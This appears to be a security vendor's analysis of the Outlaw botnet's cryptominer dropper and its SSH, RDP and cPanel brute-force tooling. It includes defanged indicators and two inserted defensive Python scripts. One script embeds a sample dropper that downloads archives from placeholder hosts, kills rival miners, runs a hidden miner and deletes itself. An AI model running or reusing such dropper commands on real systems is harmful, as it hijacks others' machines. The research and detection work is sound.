Outlaw Group Distributes Botnet for Cryptocurrency-Mining, Scanning, and Brute-Force

We previously blogged about how we uncovered the operations of the hacking group we named Outlaw, which uses an Internet Relay Chat (IRC) bot. This follow-up post covers a host that is part of the botnet operated by the group, which we found attempting to run a script on our IoT honeypot. The attacking bot used a tool called haiduc to search the internet for systems to attack, which it does by taking advantage of a common command injection vulnerability. If successful, it attempts to run the script min.sh (detected by Trend Micro as Coinminer.SH.MALXMR.ATNJ) on the targeted hosts.

This time we spotted two variants of activity from Outlaw. The script used in the first version of its bot has two functions: the miner and a haiduc-based dropper. The code for the mining part also comes in two forms. One is a plain-text bash/Perl script and the other is an obfuscated Perl script variant that avoids detection by content-inspecting intrusion prevention systems (IPS) and firewalls.

The second variant of the code, distributed by the bot, was mainly designed to brute force and further exploit the Microsoft Remote Desktop Protocol and the cPanel hosting administration interface in order to escalate privileges. This intention of further exploitation is supported by the discovery of a list of servers running a libc.so.6 library with a known vulnerability.

Overview of the first variant

The miner downloads and starts mining for Monero cryptocurrency, using a binary that is capable of running on both Linux and Android. This variant of the miner first checks for other running miners present on the system. If it finds a “foreign” miner on the target system, the script kills the related mining processes of the previous miners and starts to run its own binaries. This means that the bot here is capable of hijacking the mining activities of other bots from unrelated botnets. Do note that some Mirai variants have the same capability, but unlike certain Mirai variants, this bot does not patch the victims to protect them from further infection or reinfection.

After the mining has started, the bot has a function that checks the process list to verify that the miner is actually running. If not, it downloads the malicious files again from the source and restarts the mining process, including the check for the presence of other miners.

This process allows the attacker to steal already compromised mining hosts from other attackers and to reinfect already “owned” hosts with an updated version of the miner, thus continuing the operation even after the attackers’ XMR wallets have been hijacked.

Once the mining operation is established, the miner reports back to its owner through a compromised website that hosts a PHP script with a randomly generated name.

The other part of the script takes care of bot propagation. It uses the haiduc tool, which we previously noted to be a tool that the Outlaw group primarily uses. In this variant of the haiduc toolset, it is first used to brute force vulnerable hosts running an SSH service. For that, it takes its variable lists, hosted on a compromised website in the form of PHP scripts. Once the brute force is successful, it runs the command that spreads the bot. This is done by running the commands to install the initial min.sh script from compromised websites. It then scans various targets, as set by the commanding PHP script, and sends the results to the botnet administrator via email, with the address hardcoded in one of the PHP scripts. In our previous blog, we noted the group’s use of an IRC bot to form a botnet; this time the bot is controlled via PHP. It remains, however, that the files for the miner and the haiduc toolset are from the same group.

The infecting bot uses the URL hxxp://www[.]karaibe.us/.foo/min.sh to download the malicious shell script. Curiously, the domain also had a Google Analytics script embedded in the source code, which might have allowed the bot’s admins to monitor the campaign. At the time of writing, the domain resolves to a basketball league standings site. The Outlaw group consistently uses this technique, and it has become obvious that one of the group’s core activities is to exploit more websites over PHP vulnerabilities to get new C&C or content delivery servers.

Looking into min.sh, the infecting script

Figure 1. Initial script, min.sh

Mining activity

The first part of the script downloads the mining binary and its complementary files in a tgz archive. By adding another server/domain to the command as a fallback, the attacker ensures that the threat will not be easily blocked when one system is taken down.

Note: In this example, both commands point to the same destination; the difference is that one uses the IP address and the other uses the fully qualified domain name (FQDN). Certain security information and event management (SIEM) tools can block one or the other but usually not both, as doing so might cause performance issues.

The downloaded archive is extracted and the working directory is changed to the hidden “.bin” directory. Using a hidden directory helps the miner run unnoticed by the system administrator.

It then runs the XMR mining binary in the background, redirecting its output to “/dev/null”.

Scanning activity

In the next step, the working directory is changed to “/tmp”. The hidden “.vd” directory is also removed to ensure that only the most current version is used in the following steps. Next, sslm.tgz is downloaded, extracted, and run from that directory. It is a haiduc-based scanner that generates its target list from a PHP script hosted on the C&C server.

It sends out “the introduction” of the compromised host (see figure below) to another PHP script, hosted at the URL hxxp://www[.]karaibe[.]us/[.]foo/remote/info[.]php.

Figure 2. POST request to the C&C

After “the introduction” to the C&C, it changes the working directory back to “/tmp” and removes the infection script from the affected system.
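
The behaviours walked through above (the same archive fetched from both an IP address and an FQDN, a hidden working directory, a miner started in the background with its output silenced, competing miners killed first, and the dropper deleting itself) are all visible statically in a captured script. The following Python triage script is an added example, not code from this post or from the Outlaw toolkit: the sample dropper, its host names, IP address and pool address are constructed placeholders, and the `fqdn_to_ip` argument of `blocklisted_hosts` stands in for a passive-DNS lookup the analyst supplies, which is how a blocklist that holds only one of the two forms noted above can still match the other.

```python
"""Static triage of a dropper shell script for the behaviours described in the
min.sh walkthrough: dual IP/FQDN download of one archive, hidden working
directory, silenced background miner, killing competing miners, self-deletion.
Added example (not the Outlaw script or Trend Micro code); every host name, IP
and pool address below is a constructed placeholder."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed stand-in for a min.sh-style dropper (placeholder hosts, not IoCs).
SAMPLE_SCRIPT = r"""#!/bin/bash
cd /tmp
wget -q http://www.dropper.example/.foo/m.tgz || wget -q http://203.0.113.10/.foo/m.tgz
pkill -f xmrig; pkill -f minerd
tar xzf m.tgz
mkdir -p .bin && cd .bin
nohup ./xmrigMiner -o pool.example:3333 >/dev/null 2>&1 &
cd /tmp
rm -rf .vd
curl -s -o sslm.tgz http://www.dropper.example/.foo/sslm.tgz
tar xzf sslm.tgz
rm -f /tmp/min.sh
"""

URL_RE = re.compile(r"https?://[^\s'\"|;&]+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# cd/mkdir/rm operating on a dot-prefixed (hidden) directory such as .bin or .vd
HIDDEN_DIR_RE = re.compile(r"\b(?:cd|mkdir(?:\s+-p)?|rm\s+-\w+)\s+(?:\S*/)?(\.[A-Za-z0-9_]+)\b")
# output sent to /dev/null and the process backgrounded with a trailing '&'
SILENT_BG_RE = re.compile(r">\s*/dev/null\b.*&\s*$")
# killing well-known miner process names before starting its own
KILL_MINER_RE = re.compile(r"\b(?:pkill|killall|kill)\b[^;\n]*?\b(xmrig|minerd|cpuminer|xmr-stak)\b", re.I)
SELF_DELETE_RE = re.compile(r"\brm\s+-\w+\s+(\S+\.sh)\b")


def dual_host_downloads(script):
    """Return URL paths that are fetched both from an IP literal and from a host name."""
    hosts_by_path = defaultdict(set)
    for url in URL_RE.findall(script):
        parsed = urlparse(url)
        hosts_by_path[parsed.path].add(parsed.hostname)
    return {path: hosts for path, hosts in hosts_by_path.items()
            if any(IPV4_RE.match(h) for h in hosts)
            and any(not IPV4_RE.match(h) for h in hosts)}


def blocklisted_hosts(script, blocklist, fqdn_to_ip):
    """Match every download host against the blocklist in both of its forms.
    fqdn_to_ip is analyst-supplied (e.g. from passive DNS), so a list that holds
    only the IP still catches the FQDN form and vice versa."""
    hits = set()
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname
        forms = {host}
        if host in fqdn_to_ip:
            forms.add(fqdn_to_ip[host])
        forms.update(name for name, ip in fqdn_to_ip.items() if ip == host)
        if forms & set(blocklist):
            hits.add(host)
    return sorted(hits)


def triage(script):
    """Map each indicator name to the evidence found for it; empty dict if none."""
    findings = {}
    dual = dual_host_downloads(script)
    if dual:
        findings["dual_host_download"] = sorted(dual)
    hidden = sorted(set(HIDDEN_DIR_RE.findall(script)))
    if hidden:
        findings["hidden_workdir"] = hidden
    silent = [line.strip() for line in script.splitlines() if SILENT_BG_RE.search(line)]
    if silent:
        findings["silent_background_process"] = silent
    killed = sorted({name.lower() for name in KILL_MINER_RE.findall(script)})
    if killed:
        findings["kills_competing_miners"] = killed
    deleted = SELF_DELETE_RE.findall(script)
    if deleted:
        findings["deletes_script"] = deleted
    return findings


if __name__ == "__main__":
    for indicator, evidence in triage(SAMPLE_SCRIPT).items():
        print(f"{indicator}: {evidence}")
```

Run it on any captured script instead of `SAMPLE_SCRIPT`; a script that trips `dual_host_download` together with `hidden_workdir` and `silent_background_process` matches the dropper pattern described here closely enough to warrant pulling the referenced archives for analysis.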

Further scanning options found in the second variant of the bot

We have analyzed various forms of haiduc toolsets and have previously mentioned capturing variants of the toolkit with a populated list of targets for compromise. The two variants of haiduc described here have a purpose that has never been seen before: to test captured target systems for the presence of a running Remote Desktop Protocol (RDP) service or cPanel. RDP is used for remote management of Windows-based hosts and servers, while cPanel is an open-source cloud administration interface. If it finds either of the services on the target host, the host is saved for future exploitation.

Scanning via Remote Desktop Protocol (RDP)

A search on Shodan would reveal hundreds, if not thousands, of servers with open RDP ports exposed to the internet. In case of a compromise, an attacker can gain access to another subnet of the network that is not reachable from the internet (which could help them pivot further into the enterprise network), steal sensitive information, spy on individuals, and control industrial systems, among other things.

The script in the figure below was used to run a Perl script, psc2 (detected by Trend Micro as ELF_PORTSCAN.TNK), which searched for RDP-related open ports. Its output is fed to a tool called rdp (an ELF 32-bit LSB executable for Intel 80386), which takes the remote host address provided by the psc2 script and attempts to log in. The threat actor used this script variant for manual attacks.

Figure 3. First variant of the script running Perl script psc2 and rdp tool

The second variant of the starting script is already prepared to be controlled through a PHP-based C&C. In this case, the arguments included the “class” file (detected by Trend Micro as HKTL_SHARK.C). One variant of the class files listed known organizations, while the second one listed IP address classes based on their GeoIP location. Again, the script first runs the Perl-based port scanner and its output is supplied to the rdp tool (detected by Trend Micro as ELF_PORTSCAN.TNK). The tool also had an embedded wordlist, with 3,811 lines of generated credentials.

Figure 4. Second variant of the script running Perl script psc2 and rdp tool, with embedded wordlist

Attacking the cloud via cPanel

cPanel is a cloud hosting platform with a very common administration interface. It is often used by small- and medium-sized businesses (SMBs) for the management of their private cloud services. A successful attack could affect the victim tremendously, as the attacker could hijack the whole cloud infrastructure containing sensitive data. Regardless of the possible consequences, it is common to have the login interface for the cloud management console publicly reachable, hosted on company-owned subdomains. This bad habit is exploited by the following attack, which is simple yet can have a great impact on organizations.

As with RDP, the attack uses a list of victims rather than scanning the whole internet. Each host is enumerated for the presence of subdomains using the non-malicious script “bing-ip2hosts,” developed by Morning Star Security. The results are written to a target list called “bios,” which is then fed to a known brute-force tool named “brute” (detected by Trend Micro as HKTL_PORTSCAN), run from a bash wrapper script called “go.” The toolkit allows attackers to target certain countries using the “class” files: the “go” script uses a “class” file to generate a list of IPs, the “getdns” scripts obtain the subdomain lists by invoking “bing-ip2hosts,” and finally “brute” is called to perform the brute force.

Figure 5. cPanel attack script
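
The SSH brute forcing done by haiduc, the rdp tool with its embedded wordlist, and the cPanel attack with “brute” described above all produce the same observable on the defender's side: a burst of failed logons from one source cycling through usernames, sometimes followed by a success with a credential that was on the list. The following Python detector is an added example, not Trend Micro's or the group's code; the sshd log lines are constructed, the RDP and cPanel records are constructed, already-normalised stand-ins (for Windows event 4625 with logon type 10, and for cPanel login failures), the IP addresses are documentation ranges, and the window and thresholds are assumptions to tune per environment.

```python
"""Brute-force burst detection over normalised authentication events from
several services (SSH, RDP, cPanel). Added example, not Trend Micro's or
Outlaw's code; all log lines and records below are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth.log excerpt: one source works through a small wordlist and
# eventually succeeds with a credential from it; a second source fails once (benign).
SSH_LOG = """\
Nov 19 10:00:01 srv sshd[1200]: Failed password for root from 198.51.100.7 port 40001 ssh2
Nov 19 10:00:02 srv sshd[1201]: Failed password for invalid user admin from 198.51.100.7 port 40002 ssh2
Nov 19 10:00:03 srv sshd[1202]: Failed password for invalid user pi from 198.51.100.7 port 40003 ssh2
Nov 19 10:00:04 srv sshd[1203]: Failed password for invalid user test from 198.51.100.7 port 40004 ssh2
Nov 19 10:00:05 srv sshd[1204]: Failed password for root from 198.51.100.7 port 40005 ssh2
Nov 19 10:00:06 srv sshd[1205]: Failed password for invalid user ubuntu from 198.51.100.7 port 40006 ssh2
Nov 19 10:00:09 srv sshd[1208]: Accepted password for root from 198.51.100.7 port 40009 ssh2
Nov 19 10:05:00 srv sshd[1300]: Failed password for alice from 203.0.113.5 port 50000 ssh2
"""

SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")


def parse_sshd(text, year=2018):
    """Normalise sshd lines to (timestamp, service, source IP, user, success)."""
    events = []
    for line in text.splitlines():
        m = SSH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, "ssh", m["ip"], m["user"], m["result"] == "Accepted"))
    return events


# Constructed, already-normalised events standing in for Windows 4625 (RDP) and
# cPanel login failures, in the same shape as the sshd events above.
OTHER_EVENTS = [
    (datetime(2018, 11, 19, 11, 0, s), "rdp", "192.0.2.44", "Administrator", False)
    for s in range(0, 60, 10)
] + [
    (datetime(2018, 11, 19, 12, 0, 0), "cpanel", "192.0.2.99", "hosting", False),
    (datetime(2018, 11, 19, 12, 0, 5), "cpanel", "192.0.2.99", "hosting", False),
    (datetime(2018, 11, 19, 12, 0, 9), "cpanel", "192.0.2.99", "admin", False),
    (datetime(2018, 11, 19, 12, 0, 14), "cpanel", "192.0.2.99", "admin", True),
]


def detect_bruteforce(events, window_s=300, max_failures=5, max_users=3):
    """Sliding-window detection per (service, source). Thresholds are assumptions.
    Raises one alert per (service, source, type): 'username_spray' when a source
    fails against max_users distinct names, 'bruteforce' at max_failures failures,
    and 'success_after_bruteforce' when a logon succeeds after such a burst."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)
    alerts, seen = [], set()
    for ts, service, src, user, ok in sorted(events):
        q = recent[(service, src)]
        q.append((ts, user, ok))
        while ts - q[0][0] > window:          # drop events older than the window
            q.popleft()
        failed_users = [u for _, u, s in q if not s]
        kind = None
        if ok and len(failed_users) >= max_failures:
            kind = "success_after_bruteforce"  # a wordlist credential worked
        elif len(failed_users) >= max_failures:
            kind = "bruteforce"
        elif len(set(failed_users)) >= max_users:
            kind = "username_spray"
        if kind and (service, src, kind) not in seen:
            seen.add((service, src, kind))
            alerts.append({"type": kind, "service": service, "src": src,
                           "failures": len(failed_users),
                           "users": sorted(set(failed_users)), "at": ts.isoformat()})
    return alerts


def run_detection():
    return detect_bruteforce(parse_sshd(SSH_LOG) + OTHER_EVENTS)


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

The `success_after_bruteforce` alert is the one worth paging on: it is the point at which a host moves from “being scanned” to “saved for future exploitation” in the workflow described above, so the source address and the account that finally succeeded should go straight to containment. The cPanel source in the sample stays below both thresholds on purpose, to show that a handful of failures from one address does not by itself fire.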

Conclusion and solutions

The hacking group Outlaw’s botnet is evolving. It gained PHP-based command and control to overcome some of IRC’s shortcomings: better scalability of the C&C servers and the additional functions that the PHP language makes available.

The group tends to use well-known hacking tools as well as the haiduc tool, both usually wrapped in bash scripts that allow less-skilled users to run them. Haiduc itself is conspicuous and can therefore be monitored with low-interaction honeypots.

Regardless of the choice of tools, the group is successful in getting new targets. So far, we have spotted over 180,000 compromised hosts and 20,000 newly compromised hosts across the world, including IoT systems, various websites, cloud-based virtual private servers (VPS), and compromised Windows servers, to name a few.

Even mobile devices based on Android can be affected. This, however, requires the owner to root the device first, or alternatively to run the infected files deliberately inside a “chrooted” Linux-based system. We discovered that determining the real IP address and location of an Android device is possible through this malware.

At first, the goal of the Outlaw group seemed to be building an infrastructure capable of distributed denial of service (DDoS) against many known companies. Later, they also added SSH brute forcing so they could grow the botnet further. Then the cryptocurrency mining started, and the latest discovery described in this blog shows that RDP and cPanel brute forcing are also in the scope of the group’s operation.

To prevent risks involved in the hacking group Outlaw’s botnet operations, users can consider adopting security solutions that can defend against malicious bot-related activities through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

For further details on how the group’s operations use different files, refer to this appendix.

Indicators of Compromise (IoCs)

aaaaa@gmail[.]com
deutscheshop@gmx[.]de
hoffmannklaus254@gmail[.]com
shopde2018@gmx[.]de

Related hashes (SHA-256) – file name – detection name
4d62e6fd9e16b05a16859582cbbf6e841e2097ac6f25f35f2e078b3dfb490bb9 min.sh Coinminer.SH.MALXMR.ATNJ
fac368bf471cb8152aad779884294352e5ebaee19efcecb6c5c147e3ada8997f finish.php Trojan.PHP.MINERMAILER.A
6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4 haiduc HackTool.Linux.SSHBRUTE.A
4928a79c9e06cf4efe0110afada7ee8f1141c3f9021aff5419946cb535b99a0e rand Trojan.SH.MINERPORTSCAN.A
3f1fb3cb0cf903278934b7bd17581e49f3ac1b4eef4493096105a2ed792151b9 sparky.sh Coinminer.SH.MALXMR.ATNJ
af4ad9bf3e954c6deae18154273b4f5ea37364b3fe1536f4ae362ef15a6ced38 start Coinminer.SH.MALXMR.ATNJ
45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161 h32 HKTL_XHide.GA
7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf h64 HKTL_XHide.GA
c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031 md64 Coinminer.Linux.MALXMR.ATG
df51c6b13714079bbf276d5c5f907d873eb48f283d617415ff351a25bf834332 start Coinminer.Linux.MALXMR.ATG
1f2c76173c7a1fbb6b28c6b9e0b8bceccbbbf2bea07518f71eb8cf21d13c7ac7 daemon Coinminer.Linux.MALXMR.AA
5ffb00a0176f8797e81b242209ec7a6a29bbfac392259bf018f746a32bfd401d xmrigMiner Coinminer.Linux.MALXMR.AI
1f69b1441d5c6e351cae4c05ded6af7b2461b63b7bb52d5d9c40586d8acf545f psc2 ELF_PORTSCAN.TNK
dca76c1502a5f2307b81c71f9283097872ab842bf5e1ea12a36983d6c61675c4 rdp ELF_PORTSCAN.TNK
4b5bd8eeb308cd0e73c42e5de9c994822b06924a42f4782c090b33c56fc27979 start_ ELF_STARTER.A
8a4c8912c35449c194844b87cb7bace340e6ed3ba5ae141088a68054c8de1aad brute HKTL_PORTSCAN
97093a1ef729cb954b2a63d7ccc304b18d0243e2a77d87bbbb94741a0290d762 class HKTL_SHARK.C

67[.]205[.]129[.]169 – C&C server
167[.]114[.]54[.]15 – Infecting IP
hxxp://www[.]karaibe[.]us/[.]foo/min[.]sh
hxxp://bookaires[.]com/feed/min[.]sh
hxxp://67[.]205[.]129[.]169/[.]foo/min[.]sh
hxxp://www[.]karaibe[.]us/[.]foo/remote/info[.]php – lists IP addresses/ targets for the scanning
hxxp://www[.]karaibe[.]us/[.]foo/feed/feedp[.]php – lists tested credentials
hxxp://www[.]karaibe[.]us/[.]foo/feed/class[.]php – first two octets of an IP address to be scanned
hxxp://www[.]karaibe[.]us/[.]foo/nano[.]php

Story added 19 November 2018.